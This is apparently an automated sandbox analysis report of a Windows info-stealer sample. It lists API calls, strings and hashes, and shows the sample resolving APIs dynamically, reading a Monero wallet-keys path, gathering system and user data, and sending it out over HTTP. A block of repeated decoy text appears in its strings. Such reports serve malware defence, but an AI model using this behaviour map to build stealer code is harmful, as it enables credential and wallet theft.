15304 9fa8a0 lstrcpy 15303->15304 15305 9f2465 15304->15305 15306 9fa9b0 4 API calls 15305->15306 15307 9f2484 15306->15307 15308 9fa8a0 lstrcpy 15307->15308 15309 9f248d 15308->15309 15310 9fa9b0 4 API calls 15309->15310 15311 9f24ae 15310->15311 15312 9fa8a0 lstrcpy 15311->15312 15313 9f24b7 15312->15313 15853 9f8320 15313->15853 15315 9f24d3 15316 9fa920 3 API calls 15315->15316 15317 9f24e6 15316->15317 15318 9fa8a0 lstrcpy 15317->15318 15319 9f24ef 15318->15319 15320 9fa9b0 4 API calls 15319->15320 15321 9f2519 15320->15321 15322 9fa8a0 lstrcpy 15321->15322 15323 9f2522 15322->15323 15324 9fa9b0 4 API calls 15323->15324 15325 9f2543 15324->15325 15326 9fa8a0 lstrcpy 
15325->15326 15327 9f254c 15326->15327 15328 9f8320 17 API calls 15327->15328 15329 9f2568 15328->15329 15330 9fa920 3 API calls 15329->15330 15331 9f257b 15330->15331 15332 9fa8a0 lstrcpy 15331->15332 15333 9f2584 15332->15333 15334 9fa9b0 4 API calls 15333->15334 15335 9f25ae 15334->15335 15336 9fa8a0 lstrcpy 15335->15336 15337 9f25b7 15336->15337 15338 9fa9b0 4 API calls 15337->15338 15339 9f25d6 15338->15339 15340 9fa8a0 lstrcpy 15339->15340 15341 9f25df 15340->15341 15342 9fa9b0 4 API calls 15341->15342 15343 9f2600 15342->15343 15344 9fa8a0 lstrcpy 15343->15344 15345 9f2609 15344->15345 15889 9f8680 15345->15889 15347 9f2620 15348 9fa920 3 API calls 15347->15348 15349 9f2633 15348->15349 15350 9fa8a0 lstrcpy 15349->15350 15351 9f263c 15350->15351 15352 9f265a lstrlen 15351->15352 15353 9f266a 15352->15353 15354 9fa740 lstrcpy 15353->15354 15355 9f267c 15354->15355 15356 9e1590 lstrcpy 15355->15356 15357 9f268d 15356->15357 15899 9f5190 15357->15899 15359 9f2699 15359->13791 16087 9faad0 15360->16087 15362 9e5009 InternetOpenUrlA 15363 9e5021 15362->15363 15364 9e502a InternetReadFile 15363->15364 15365 9e50a0 InternetCloseHandle InternetCloseHandle 15363->15365 15364->15363 15366 9e50ec 15365->15366 15366->13795 16088 9e98d0 15367->16088 15369 9f0759 15370 9f077d 15369->15370 15371 9f0a38 15369->15371 15373 9f0799 StrCmpCA 15370->15373 15372 9e1590 lstrcpy 15371->15372 15374 9f0a49 15372->15374 15375 9f0843 15373->15375 15376 9f07a8 15373->15376 16264 9f0250 15374->16264 15381 9f0865 StrCmpCA 15375->15381 15378 9fa7a0 lstrcpy 15376->15378 15380 9f07c3 15378->15380 15383 9e1590 lstrcpy 15380->15383 15382 9f0874 15381->15382 15419 9f096b 15381->15419 15384 9fa740 lstrcpy 15382->15384 15385 9f080c 15383->15385 15387 9f0881 15384->15387 15388 9fa7a0 lstrcpy 15385->15388 15386 9f099c StrCmpCA 15389 9f09ab 15386->15389 15390 9f0a2d 15386->15390 15391 9fa9b0 4 API calls 15387->15391 15392 9f0823 15388->15392 15393 9e1590 lstrcpy 15389->15393 15390->13799 15394 
9f08ac 15391->15394 15395 9fa7a0 lstrcpy 15392->15395 15396 9f09f4 15393->15396 15397 9fa920 3 API calls 15394->15397 15398 9f083e 15395->15398 15399 9fa7a0 lstrcpy 15396->15399 15400 9f08b3 15397->15400 16091 9efb00 15398->16091 15402 9f0a0d 15399->15402 15403 9fa9b0 4 API calls 15400->15403 15404 9fa7a0 lstrcpy 15402->15404 15405 9f08ba 15403->15405 15406 9f0a28 15404->15406 15419->15386 15739 9fa7a0 lstrcpy 15738->15739 15740 9e1683 15739->15740 15741 9fa7a0 lstrcpy 15740->15741 15742 9e1695 15741->15742 15743 9fa7a0 lstrcpy 15742->15743 15744 9e16a7 15743->15744 15745 9fa7a0 lstrcpy 15744->15745 15746 9e15a3 15745->15746 15746->14622 15748 9e47c6 15747->15748 15749 9e4838 lstrlen 15748->15749 15773 9faad0 15749->15773 15751 9e4848 InternetCrackUrlA 15752 9e4867 15751->15752 15752->14699 15754 9fa740 lstrcpy 15753->15754 15755 9f8b74 15754->15755 15756 9fa740 lstrcpy 15755->15756 15757 9f8b82 GetSystemTime 15756->15757 15759 9f8b99 15757->15759 15758 9fa7a0 lstrcpy 15760 9f8bfc 15758->15760 15759->15758 15760->14714 15763 9fa931 15761->15763 15762 9fa988 15764 9fa7a0 lstrcpy 15762->15764 15763->15762 15765 9fa968 lstrcpy lstrcat 15763->15765 15766 9fa994 15764->15766 15765->15762 15766->14717 15767->14832 15769 9e4eee 15768->15769 15770 9e9af9 LocalAlloc 15768->15770 15769->14720 15769->14722 15770->15769 15771 9e9b14 CryptStringToBinaryA 15770->15771 15771->15769 15772 9e9b39 LocalFree 15771->15772 15772->15769 15773->15751 15774->14842 15775->14983 15776->14985 15777->14993 15906 9f77a0 15778->15906 15781 9f76c6 RegOpenKeyExA 15783 9f76e7 RegQueryValueExA 15781->15783 15784 9f7704 RegCloseKey 15781->15784 15782 9f1c1e 15782->15075 15783->15784 15784->15782 15786 9f1c99 15785->15786 15786->15089 15788 9f1e09 15787->15788 15788->15131 15790 9f7a9a wsprintfA 15789->15790 15791 9f1e84 15789->15791 15790->15791 15791->15145 15793 9f7b4d 15792->15793 15794 9f1efe 15792->15794 15913 9f8d20 LocalAlloc CharToOemW 15793->15913 15794->15159 15797 9fa740 lstrcpy 
15796->15797 15798 9f7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15797->15798 15805 9f7c25 15798->15805 15799 9f7d18 15801 9f7d1e LocalFree 15799->15801 15802 9f7d28 15799->15802 15800 9f7c46 GetLocaleInfoA 15800->15805 15801->15802 15804 9fa7a0 lstrcpy 15802->15804 15803 9fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15803->15805 15806 9f7d37 15804->15806 15805->15799 15805->15800 15805->15803 15807 9fa8a0 lstrcpy 15805->15807 15806->15172 15807->15805 15809 9f2008 15808->15809 15809->15187 15811 9f94b5 15810->15811 15812 9f9493 GetModuleFileNameExA CloseHandle 15810->15812 15813 9fa740 lstrcpy 15811->15813 15812->15811 15814 9f2091 15813->15814 15814->15202 15816 9f7e68 RegQueryValueExA 15815->15816 15818 9f2119 15815->15818 15817 9f7e8e RegCloseKey 15816->15817 15817->15818 15818->15216 15820 9f7fb9 GetLogicalProcessorInformationEx 15819->15820 15821 9f7fd8 GetLastError 15820->15821 15826 9f8029 15820->15826 15822 9f8022 15821->15822 15831 9f7fe3 15821->15831 15823 9f2194 15822->15823 15827 9f89f0 2 API calls 15822->15827 15823->15230 15828 9f89f0 2 API calls 15826->15828 15827->15823 15829 9f807b 15828->15829 15829->15822 15830 9f8084 wsprintfA 15829->15830 15830->15823 15831->15820 15831->15823 15914 9f89f0 15831->15914 15917 9f8a10 GetProcessHeap RtlAllocateHeap 15831->15917 15833 9f220f 15832->15833 15833->15244 15835 9f89b0 15834->15835 15836 9f814d GlobalMemoryStatusEx 15835->15836 15837 9f8163 __aulldiv 15836->15837 15838 9f819b wsprintfA 15837->15838 15839 9f2289 15838->15839 15839->15258 15841 9f87fb GetProcessHeap RtlAllocateHeap wsprintfA 15840->15841 15843 9fa740 lstrcpy 15841->15843 15844 9f230b 15843->15844 15844->15272 15846 9fa740 lstrcpy 15845->15846 15850 9f8229 15846->15850 15847 9f8263 15849 9fa7a0 lstrcpy 15847->15849 15848 9fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15848->15850 15851 9f82dc 15849->15851 15850->15847 15850->15848 15852 9fa8a0 lstrcpy 15850->15852 15851->15289 15852->15850 15854 9fa740 lstrcpy 15853->15854 15855 9f835c 
RegOpenKeyExA 15854->15855 15856 9f83ae 15855->15856 15857 9f83d0 15855->15857 15858 9fa7a0 lstrcpy 15856->15858 15859 9f83f8 RegEnumKeyExA 15857->15859 15860 9f8613 RegCloseKey 15857->15860 15870 9f83bd 15858->15870 15862 9f843f wsprintfA RegOpenKeyExA 15859->15862 15863 9f860e 15859->15863 15861 9fa7a0 lstrcpy 15860->15861 15861->15870 15864 9f8485 RegCloseKey RegCloseKey 15862->15864 15865 9f84c1 RegQueryValueExA 15862->15865 15863->15860 15866 9fa7a0 lstrcpy 15864->15866 15867 9f84fa lstrlen 15865->15867 15868 9f8601 RegCloseKey 15865->15868 15866->15870 15867->15868 15869 9f8510 15867->15869 15868->15863 15871 9fa9b0 4 API calls 15869->15871 15870->15315 15872 9f8527 15871->15872 15873 9fa8a0 lstrcpy 15872->15873 15874 9f8533 15873->15874 15875 9fa9b0 4 API calls 15874->15875 15876 9f8557 15875->15876 15877 9fa8a0 lstrcpy 15876->15877 15878 9f8563 15877->15878 15879 9f856e RegQueryValueExA 15878->15879 15879->15868 15880 9f85a3 15879->15880 15881 9fa9b0 4 API calls 15880->15881 15882 9f85ba 15881->15882 15883 9fa8a0 lstrcpy 15882->15883 15884 9f85c6 15883->15884 15885 9fa9b0 4 API calls 15884->15885 15886 9f85ea 15885->15886 15887 9fa8a0 lstrcpy 15886->15887 15888 9f85f6 15887->15888 15888->15868 15890 9fa740 lstrcpy 15889->15890 15891 9f86bc CreateToolhelp32Snapshot Process32First 15890->15891 15892 9f875d CloseHandle 15891->15892 15893 9f86e8 Process32Next 15891->15893 15894 9fa7a0 lstrcpy 15892->15894 15893->15892 15898 9f86fd 15893->15898 15897 9f8776 15894->15897 15895 9fa9b0 lstrcpy lstrlen lstrcpy lstrcat 15895->15898 15896 9fa8a0 lstrcpy 15896->15898 15897->15347 15898->15893 15898->15895 15898->15896 15900 9fa7a0 lstrcpy 15899->15900 15901 9f51b5 15900->15901 15902 9e1590 lstrcpy 15901->15902 15903 9f51c6 15902->15903 15918 9e5100 15903->15918 15905 9f51cf 15905->15359 15909 9f7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15906->15909 15908 9f76b9 15908->15781 15908->15782 15910 9f7765 RegQueryValueExA 15909->15910 15911 9f7780 RegCloseKey 

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(75900000,013B0768), ref: 009F98A1
                              • GetProcAddress.KERNEL32(75900000,013B0798), ref: 009F98BA
                              • GetProcAddress.KERNEL32(75900000,013B07C8), ref: 009F98D2
                              • GetProcAddress.KERNEL32(75900000,013B07E0), ref: 009F98EA
                              • GetProcAddress.KERNEL32(75900000,013B0648), ref: 009F9903
                              • GetProcAddress.KERNEL32(75900000,013B8870), ref: 009F991B
                              • GetProcAddress.KERNEL32(75900000,013A6400), ref: 009F9933
                              • GetProcAddress.KERNEL32(75900000,013A6380), ref: 009F994C
                              • GetProcAddress.KERNEL32(75900000,013B06C0), ref: 009F9964
                              • GetProcAddress.KERNEL32(75900000,013B0780), ref: 009F997C
                              • GetProcAddress.KERNEL32(75900000,013B0708), ref: 009F9995
                              • GetProcAddress.KERNEL32(75900000,013B07B0), ref: 009F99AD
                              • GetProcAddress.KERNEL32(75900000,013A65E0), ref: 009F99C5
                              • GetProcAddress.KERNEL32(75900000,013B0738), ref: 009F99DE
                              • GetProcAddress.KERNEL32(75900000,013B07F8), ref: 009F99F6
                              • GetProcAddress.KERNEL32(75900000,013A6420), ref: 009F9A0E
                              • GetProcAddress.KERNEL32(75900000,013B0828), ref: 009F9A27
                              • GetProcAddress.KERNEL32(75900000,013B08A0), ref: 009F9A3F
                              • GetProcAddress.KERNEL32(75900000,013A6500), ref: 009F9A57
                              • GetProcAddress.KERNEL32(75900000,013B08B8), ref: 009F9A70
                              • GetProcAddress.KERNEL32(75900000,013A6360), ref: 009F9A88
                              • LoadLibraryA.KERNEL32(013B0858,?,009F6A00), ref: 009F9A9A
                              • LoadLibraryA.KERNEL32(013B08D0,?,009F6A00), ref: 009F9AAB
                              • LoadLibraryA.KERNEL32(013B0900,?,009F6A00), ref: 009F9ABD
                              • LoadLibraryA.KERNEL32(013B08E8,?,009F6A00), ref: 009F9ACF
                              • LoadLibraryA.KERNEL32(013B0918,?,009F6A00), ref: 009F9AE0
                              • GetProcAddress.KERNEL32(75070000,013B0870), ref: 009F9B02
                              • GetProcAddress.KERNEL32(75FD0000,013B0888), ref: 009F9B23
                              • GetProcAddress.KERNEL32(75FD0000,013B8C40), ref: 009F9B3B
                              • GetProcAddress.KERNEL32(75A50000,013B8E98), ref: 009F9B5D
                              • GetProcAddress.KERNEL32(74E50000,013A6440), ref: 009F9B7E
                              • GetProcAddress.KERNEL32(76E80000,013B88A0), ref: 009F9B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 009F9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 009F9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 0cdefd4d35e3b568ba6839327a9d06ee1c690a5f7ece731003a1d36b44bc0977
                              • Instruction ID: ca7fe1a27d1157bd71ce30ce4e8c4502e7d78374f45b5b771a8e6c8d08cf7256
                              • Opcode Fuzzy Hash: 0cdefd4d35e3b568ba6839327a9d06ee1c690a5f7ece731003a1d36b44bc0977
                              • Instruction Fuzzy Hash: 81A14DB55302409FD364EFA9EE88B6E37F9F74CB01704452AE605C3AA4D7399843CB56

                              Control-flow Graph

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009E460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 009E479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E45C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009E46CD
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 6402300b1463d57aa5d22bfa8fc1af7d920cf07901525b4f1c5b4a5ad3e12f5b
                              • Instruction ID: 5418dff17df9f47667cc2617da75dc9b7091bf5e2001fe49b3207f2f75b75bc0
                              • Opcode Fuzzy Hash: 6402300b1463d57aa5d22bfa8fc1af7d920cf07901525b4f1c5b4a5ad3e12f5b
                              • Instruction Fuzzy Hash: 9A410260FD37087BC63CFFB4B87EADEB65F6F56B00F405880AC68522C0EAA0550449B2

                              Control-flow Graph

                              APIs
                                • Part of subcall function 009FA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009FA7E6
                                • Part of subcall function 009E47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 009E4839
                                • Part of subcall function 009E47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 009E4849
                                • Part of subcall function 009FA740: lstrcpy.KERNEL32(00A00E17,00000000), ref: 009FA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009E4915
                              • StrCmpCA.SHLWAPI(?,013BE3C0), ref: 009E493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009E4ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00A00DDB,00000000,?,?,00000000,?,",00000000,?,013BE390), ref: 009E4DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 009E4E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 009E4E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 009E4E49
                              • InternetCloseHandle.WININET(00000000), ref: 009E4EAD
                              • InternetCloseHandle.WININET(00000000), ref: 009E4EC5
                              • HttpOpenRequestA.WININET(00000000,013BE290,?,013BDC98,00000000,00000000,00400100,00000000), ref: 009E4B15
                                • Part of subcall function 009FA9B0: lstrlen.KERNEL32(?,013B8BA0,?,\Monero\wallet.keys,00A00E17), ref: 009FA9C5
                                • Part of subcall function 009FA9B0: lstrcpy.KERNEL32(00000000), ref: 009FAA04
                                • Part of subcall function 009FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009FAA12
                                • Part of subcall function 009FA8A0: lstrcpy.KERNEL32(?,00A00E17), ref: 009FA905
                                • Part of subcall function 009FA920: lstrcpy.KERNEL32(00000000,?), ref: 009FA972
                                • Part of subcall function 009FA920: lstrcat.KERNEL32(00000000), ref: 009FA982
                              • InternetCloseHandle.WININET(00000000), ref: 009E4ECF
                              Strings
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 884a066a2e1216c3d959502750a4d89af2d08ee6cc057d162f79da0721110544
                              • Instruction ID: 2b61944dc41a99aa4ef521e17bd3dadaf422672bed461bd154bffb10d5402539
                              • Opcode Fuzzy Hash: 884a066a2e1216c3d959502750a4d89af2d08ee6cc057d162f79da0721110544
                              • Instruction Fuzzy Hash: 2A12CFB191011CAADB15EB90DC92FFEB379BF94340F5041A9B20A62491DFB06F49CF66
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F7910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F7917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 009F792F
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: cc40a50fa86c2d15ac247ede932d7c1c682a6ae2d9d20852759d2a38264d0e9f
                              • Instruction ID: 59080d35c3fb3f9207621ab8b2ef6a40bd03d5f523f8bc3764830403b37d095d
                              • Opcode Fuzzy Hash: cc40a50fa86c2d15ac247ede932d7c1c682a6ae2d9d20852759d2a38264d0e9f
                              • Instruction Fuzzy Hash: C20181B1A04209EBC710DF98DD45FAEFBB8FB04B65F10421AFA45E36C0C77859408BA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009E11B7), ref: 009F7880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 009F7887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 009F789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2100900274.00000000009E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true
                              • Associated: 00000000.00000002.2100887792.00000000009E0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000A9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000AC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2100900274.0000000000C2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000C3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000DCD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EA7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ECB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000ED3000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101037999.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101379187.0000000000EE3000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101492369.0000000001084000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2101505748.0000000001085000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_9e0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
